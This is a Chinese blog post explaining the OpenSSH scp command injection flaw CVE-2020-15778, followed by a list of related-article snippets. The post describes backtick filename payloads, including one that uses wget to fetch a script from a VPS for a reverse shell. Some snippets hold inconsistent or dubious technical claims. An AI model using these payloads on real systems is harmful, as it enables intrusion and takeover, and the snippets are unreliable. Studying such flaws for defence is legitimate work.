openssh漏洞_CVE202015778 SSH漏洞复现分析

最新推荐文章于 2024-07-02 17:06:53 发布
最新推荐文章于 2024-07-02 17:06:53 发布
阅读量911 收藏
点赞数
文章标签: openssh漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39752800/article/details/111284659
版权

在众多的工业路由器和部分控制器内,采用了OpenSSH来做外部连接和管理。2020年7月9日被国外安全研究员ChinmayPandya发现OpenSSH 8.3 p1及之前版本中SCP命令里存在命令注入漏洞。

99981b2fbf322e6eccfabb13ecf9e033.png

上面为https://github.com/openssh/openssh-portable/blob/master/scp.c的代码,989行则是漏洞触发所在。当将文件复制到远程服务器时,文件路径附加在本地scp命令的末尾。例如,如果执行以下命令:

scp SourceFileuser@host:directory/TargetFile

它将执行一个本地命令:

scp-t directory/TargetFile

在创建本地scp命令时,它没有清理文件名。攻击者可以采用反引号(`)文件作为命令注入。而linux系统是可以接受以反引号(`)为文件命名方式。如果你尝试把payload放在反引号中作为文件名,当调用scp命令时就会触发这个指令的执行。

漏洞利用场景:

攻击者可以采用U盘伪装成设备固件或者某种工具,在U盘中创建深度子目录,某一个目录中一个文件可以命名为`payload`,比如`reboot`。当受害者拷贝U盘目录及文件的时候采用scp -r \文件夹 RemoteIP:\文件夹 这条命令的时候,就会触发受害者的机器重启,同理如果你采用反引号+useradd这样的文件名,就可以直接在受害者机器上开启后门。当然变态一点的红队利用,就是在VPS上假设FTP放入反弹shell脚本,然后利用反引号(`)结合wget http:// vps:port/xxx.sh | sh ./xxx.sh 作为文件名,触发受害者反弹shell到VPS上。

对于远程命令的执行,还是需要bypass authorized_keys,所以远程被利用几率比较小。以下这段PoC视频,只是给大家演示一下,是可以存在远程执行命令的可能性,但是前提是要bypass authorized_keys否则,你还是需要知道

password的。

防护解决方案

截止到现在openssh的github并没有修补这个漏洞,禁用scp -r 整体目录拷贝方式,采用tar压缩目录为单一文件后,scp上传到远端机器后,再ssh远端机器解压目录。

参考:https://github.com/cpandya2909/CVE-2020-15778

weixin_39752800
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-15778漏洞复现学习
顶峰
03-29 1071
有人可能觉得已经拿到ssh的用户名和密码了,直接ssh进去不就好了,回想过程,环境配置中禁用了ssh登录,只保留scp。不能直接使用ssh连接,我们是通过scp调用ssh,完成连接。该漏洞复现简单,漏洞危害大,利用局限性很大,需要ssh的用户密码。如果我们找到目标用户的用户名和密码,而且目标用户关闭了ssh,但是开启scp,那我们就可以利用这种漏洞反弹shell获取权限。
命令注入_OpenSSH 命令注入漏洞通告(CVE202015778
weixin_35543991的博客
01-12 369
文章转载自深信服安全团队 概述2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告。漏洞名称:OpenSSH 命令注入漏洞...
CVE-2020-15778漏洞复现
m0_58606546的博客
11-30 2693
1.漏洞描述 (1)简介:2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。该漏洞属于命令执行漏洞,目前绝大多数linux系统受影响。 (2)scp介绍:scp是Linux下基于 ssh 登陆进行安全的远程文件拷贝命,用于不同Linux系统之间复制文件和目录。该命令由openssh的scp.c及其他相关代码实现。在本次漏洞复现中就是利用scp命
查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)
weixin_39707536的博客
12-06 1616
OpenSSH命令注入漏洞复现(CVE-2020-15778)目录漏洞描述漏洞等级漏洞影响版本漏洞复现修复建议▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。OpenSSH由OpenBSD项目的一些开发人员开发, 并以BSD样式的许可证提供,且已被集成到许多商业产品中。 2020年6月9日,研...
SSH远程命令执行漏洞(CVE-2024-6387)验证
最新发布
一颗小白菜的博客
07-02 1204
OpenSSHSSH(Secure SHell)协议的开源实现,它通过不安全的网络在两个不受信任的主机之间提供安全的加密通信。OpenSSH 广泛用于基于Unix 的系统,通常用于安全远程登录和远程文件传输,以及其它网络服务。OpenSSH 远程代码执行漏洞(CVE-2024-6387),该漏洞是由于OpenSSH服务器 (sshd) 中的信号处理程序竞争问题,未经身份验证的攻击者可以利用此漏洞在Linux系统上以root身份执行任意代码。
OpenSSH命令注入漏洞(CVE-2020-15778)
热门推荐
qq_42947816的博客
02-09 2万+
一般在特定环境下利用,比如在知道SSH账户密码后,但禁用SSH登陆或SSH连接被阻止,服务器允许使用scp传文件的情况下,可对其进行命令注入,所以如果攻击者不知道ssh账密,此漏洞无法利用。
ssh.zip_Secure Shell_openssh_ssh_ssh compress_zip
09-23
OpenSSH 包含了一系列相关工具,如 `ssh`(客户端)、`sshd`(服务器端)、`scp`(安全复制)、`sftp`(安全文件传输协议)等,它们都基于 SSH 协议进行安全通信。OpenSSH 已成为 Linux 和 Unix 系统上默认的 SSH ...
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041) OpenSSH 是一个开源的 SSH 服务器实现,广泛应用于 Linux、Unix 和 Windows 等操作系统中。然而,OpenSSH 也存在一些安全漏洞,其中之一就是资源管理错误漏洞(CVE-2021-...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
OpenSSH 用户名枚举漏洞(CVE-2018-15473).zip
03-06
OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。 学习笔记
Linux系统中OpenSSH的安装配置.rar_linux 配置_openssh_ssh
09-21
OpenSSH包括了SSH客户端和服务器,以及相关的加密密钥管理工具。在这个压缩包文件中,我们将探讨如何在Linux系统上安装和配置OpenSSH。 首先,我们需要了解OpenSSH的基本组件。OpenSSH服务器(sshd)监听网络上的...
查看openssh版本_OpenSSH 命令注入漏洞CVE202015778复现
weixin_39561179的博客
12-11 793
漏洞详情漏洞说明#OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞源于外部输入数据构造操作系统可执行命令过程中,网络系统或产品未正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。漏洞编号#CVE-2020-15778影响范围#OpenSSH <= 8.3p1危害等级#高危利用条件#知道目标的ssh密码修复建议#先...
CVE-2020-15778漏洞复现 OpenSSH命令注入(环境搭建+命令执行+反弹shell)
ch4nge
10-27 2845
CVE-2020-15778漏洞复现学习 作者:ch4nge 漏洞名称: OpenSSH 命令注入漏洞(CVE-2020-15778) 等级: 高危 类型:命令执行 影响版本: OpenSSH <= 8.3p1 利用难度:简单 漏洞介绍 漏洞公开披露2020年7月18日,openssh 8.3p1的SCP命令存在命令注入漏洞,攻击者可以利用此漏洞执行任意命令。 1. scp命令 简单来说就是A这里执行scp命令,将A电脑里的文件传输到B电脑(linux系统) 命令格式 scp [参数] [原路径] [
CVE-2020-15778 openssh漏洞修复
N07ME的博客
12-11 6893
漏洞描述 https://access.redhat.com/security/cve/cve-2020-15778 简单来说,就是scp命令是可以注入特殊字段,在目标主机上执行指令的。 原理是因为scp是通过ssh实现的,一样的需要用户名和密码才能登陆。也就是说,这个漏洞其实针对的是那些禁用了ssh但是没禁用scp的主机,针对这些主机,可以从外部通过scp实现和ssh一样的功能。 漏洞修复方案 1.升级到openssh-8.4以上的版本 (要求操作系统版本在centos 8及以上) 2.禁用scp命令 m
openssh漏洞_OpenSSH命令注入漏洞复现CVE202015778
weixin_39998273的博客
12-06 2891
安全漏洞复现VULNERABILITYOpenSSH命令注入漏洞复现(CVE-2020-15778)0x00软件介绍OpenSSHSSH(Secure SHell)协议的免费开源实现。OpenSSH是一套用于安全访问计算机的连接工具,支持对所有的传输进行加密。openssh-8.3p1及以前版本中scp 中的scp.c文件存在操作系统命令注入漏洞,该漏洞源于外部输入数据构造操作系统可执...
运维-CVE-2020-15778漏洞修复
Eistert
01-10 7704
漏洞描述 Openssh 命令注入漏洞(CVE-2020-15778)【低可信】 风险等级: 高 漏洞ID: SF-0005-02635 端口(服务): 22(ssh) 风险描述: 【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 8.3p1及之前版
网络攻防之CVE-2020-15778漏洞复现及修复详细过程
m0_62574258的博客
02-29 2378
OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。(10)可以看到在监听窗口反弹出靶机的shell(root@localhost),攻击成功,即使靶机通过防火墙禁止了ssh远程登录能通过此漏洞远程控制靶机,在shell中输入ls命令查看靶机的根目录文件。漏洞危害:该漏洞危害性很高, 因为一旦入侵成功,攻击者可以尝试在目标系统上的shell上执行恶意代码,执行各种命令,获取系统信息,上传或下载文件,甚至完全控制目标系统。
openssh_8.4p1漏洞复现
05-09
近日,作者成功在Ubuntu 20.04 LTS系统上实现了OpenSSH 8.4p1漏洞复现。该漏洞是一个堆缓冲区溢出漏洞,攻击者可利用此漏洞执行任意代码或拒绝服务攻击。 在复现过程中,作者利用了Ubuntu 20.04 LTS系统中预装的OpenSSH服务器,同时安装了一个客户端用于模拟攻击。攻击流程如下: 首先,需要生成一个用于攻击的SSH私钥,该私钥长度要大于等于384bit,作者使用了一个长度为512bit的私钥。然后,我们需要在攻击机上启动一个恶意SSH服务器,在该服务器上部署恶意的公钥。接下来,使用攻击机的SSH客户端连接到目标服务器,并使用恶意私钥进行身份验证。此时,由于OpenSSH 8.4p1存在堆缓冲区溢出漏洞,攻击者可在目标服务器上执行任意代码。 在本次复现中,作者利用了一个名为“ssh-exploit”的实用程序来执行攻击。该工具可自动生成攻击代码,并自动执行攻击。通过这种方式,作者成功复现OpenSSH 8.4p1漏洞,证明了该漏洞的存在性和危害性,并为安全研究工作提供了重要的参考。 为了避免OpenSSH 8.4p1漏洞带来的安全风险,系统管理员可以采取多种措施进行防范。首先,建议管理员尽快升级OpenSSH到修复该漏洞的版本。其次,管理员可以限制SSH服务的访问权限,避免未授权的远程访问。此外,管理员还应定期检查系统安全性并修补漏洞,以保持系统的安全性和稳定性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值